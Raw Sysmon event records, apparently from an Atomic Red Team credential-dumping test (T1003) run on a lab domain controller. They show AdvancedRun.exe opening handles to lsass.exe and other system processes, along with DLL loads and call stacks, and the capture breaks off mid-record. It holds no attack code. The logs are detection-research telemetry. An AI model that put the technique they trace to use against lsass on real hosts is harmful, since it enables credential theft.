17:50:58.269{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0C00-000000002702}652C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967221Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.269{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0A00-000000002702}628C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967220Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.269{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967218Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.269{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0800-000000002702}500C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967217Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.269{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0700-000000002702}492C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967216Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.269{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0500-000000002702}420C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967215Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.269{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE2-61EA-0200-000000002702}320C:\Windows\System32\smss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 734700x80000000000000003967214Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.269{834264DD-F282-61EA-2004-000000002702}988C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\psapi.dll10.0.14393.0 (rs1_release.160715-1616)Process Status HelperMicrosoft® Windows® Operating SystemMicrosoft CorporationPSAPIMD5=7B73FC5AD82AF0FB84212106455E0D48,SHA256=CF6A2C746B3A9B9294A41DE686ED35FC99BB6A8ABEA7DC6A81D15C67613B98D6trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000003967210Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.254{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE2-61EA-EB03-000000000000}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967208Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.254{834264DD-DAE4-61EA-0C00-000000002702}652332C:\Windows\system32\lsass.exe{834264DD-F282-61EA-2004-000000002702}988C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 734700x80000000000000003967207Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.238{834264DD-F282-61EA-2004-000000002702}988C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=203F58BA41B48A59D6A047E0233DB422,SHA256=4204F7C2B4E13AA3819A180FACA724435F6400FE97D2EF6C74634A0D7E51F7F3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003967206Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.238{834264DD-F282-61EA-2004-000000002702}988C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=935CA0F4A51D83AED974E5D589AB41E7,SHA256=C2D64CAE0D03B259EE0B27CE8012710B80DB3A5D1DFCA1ACB2018712A4DC294DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003967201Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.238{834264DD-F282-61EA-2004-000000002702}988C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=4BA1C50E6607AE70495B58874963B901,SHA256=72BBBB4145E058C3B12504AC0EC128CD44E282D40959D018192899276A2B9C69trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003967200Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.238{834264DD-F282-61EA-2004-000000002702}988C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=0887C15A40AA6286ABACDF5FA5EADFC8,SHA256=C031E35864A113C505E5E1CCBF9BE34164823C67E41604A60276D1B89ACE08D7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003967199Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.238{834264DD-F282-61EA-2004-000000002702}988C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=A6F22CA344FD1B7D75D49ECC718693C8,SHA256=C7787F59263B7D5246B931531AB4DC4C430E1BF8260775B7A751D4994A5D3489trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000003967198Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.238{834264DD-DAE4-61EA-0C00-000000002702}652332C:\Windows\system32\lsass.exe{834264DD-F282-61EA-1F04-000000002702}2396C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 734700x80000000000000003967197Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.223{834264DD-F282-61EA-2004-000000002702}988C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\windows.storage.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=B77BEE429FC293E60D82B5733F3823EE,SHA256=7CA6CF34FBB9CDF160018C81B9D3A1894477918A67BA53E728689041DEA4C646trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003967196Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.223{834264DD-F282-61EA-2004-000000002702}988C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=90A1CD387F9CB30F86D34B88BFCD83A1,SHA256=5F6CE9777CDC7B0A0E98C90709C41C379415DBA654A39B332BB683A7F2B86E97trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003967195Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.223{834264DD-F282-61EA-2004-000000002702}988C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\shell32.dll10.0.14393.4886 (rs1_release.220104-1735)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft CorporationSHELL32.DLLMD5=F27E9ABE4DCD6E5CD27820AF12993889,SHA256=D67BA8D05C35C53CC669CFEB2FAA8139D389257EFE5209781438B4043694A763trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003967194Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.223{834264DD-F282-61EA-2004-000000002702}988C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\shlwapi.dll10.0.14393.4169 (rs1_release.210107-1130)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=0FDEB9236FF287E329F2EF155BA8AE56,SHA256=5F0C2A29312C82D14B8B42D2B6AAFEB82EBAD20822B603FD162E6AAF39B06C95trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003967193Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.223{834264DD-F282-61EA-2004-000000002702}988C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\sechost.dll10.0.14393.4886 (rs1_release.220104-1735)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=7635DDA92A9ACC5A31C18AF7B31DDF6D,SHA256=0BD8A481DF3DE0170DD1569F588AE70B9BB9D5C4DD34944F72208B9DEEF76BB6trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003967192Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.223{834264DD-F282-61EA-1F04-000000002702}2396C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=203F58BA41B48A59D6A047E0233DB422,SHA256=4204F7C2B4E13AA3819A180FACA724435F6400FE97D2EF6C74634A0D7E51F7F3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003967191Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.223{834264DD-F282-61EA-2004-000000002702}988C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\SHCore.dll10.0.14393.4169 (rs1_release.210107-1130)SHCOREMicrosoft® Windows® Operating SystemMicrosoft CorporationSHCORE.dllMD5=E3851CE4A433475612CB0E1552A733E3,SHA256=F391BAA7AFF5734842737FC1B4C58856BA5E409A7B97C037995F0F26150A85FAtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003967190Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.223{834264DD-F282-61EA-2004-000000002702}988C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=6215B591FCA75825262B29613A48836C,SHA256=B34EED73CE76E4AA1A0812E9BE1AE093549B164341F988CA877E27E545C3C1B8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003967189Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.223{834264DD-F282-61EA-2004-000000002702}988C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\comdlg32.dll10.0.14393.4283 (rs1_release.210303-1802)Common Dialogs DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcomdlg32.dllMD5=A7152A41A642F6976B4226FA6A22F48D,SHA256=2DBDB16F905A9150669B9017D5C4A0AE75DBB6E52298F0FEFE1849C3FC5D9909trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003967188Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.223{834264DD-F282-61EA-2004-000000002702}988C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=3D4308BAC53B881B16D9BD1006ABDC65,SHA256=26DF85FC22F9FCAA2212CB66612FE8F5CC6382953FE81B9C34128E43080C7891trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003967187Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.223{834264DD-F282-61EA-2004-000000002702}988C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=CA6447DDCA724F0C5C0CAFDE184EFE64,SHA256=F9664337B60A332571FCA81CC3E6DD194DCE20C8546980FD283CA892D0CC873CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003967186Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.223{834264DD-F282-61EA-2004-000000002702}988C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32full.dll10.0.14393.4886 (rs1_release.220104-1735)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=AB5AE3CC1EAA79B84589257A14BC2480,SHA256=BD0216233D84012BD61BE38964798F8F6686DA61E2E8E04D1B395AB8566CA084trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003967185Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.223{834264DD-F282-61EA-2004-000000002702}988C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\sspicli.dll10.0.14393.4704 (rs1_release.211004-1917)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecurity.dllMD5=CF0985D6545196D0EBDCB6C2630BBDC1,SHA256=1990B384CE1E1809B90D617506DEF24E654CE7A4E93C5BDCD718DED2ECCC53A8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003967184Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.223{834264DD-F282-61EA-1F04-000000002702}2396C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft 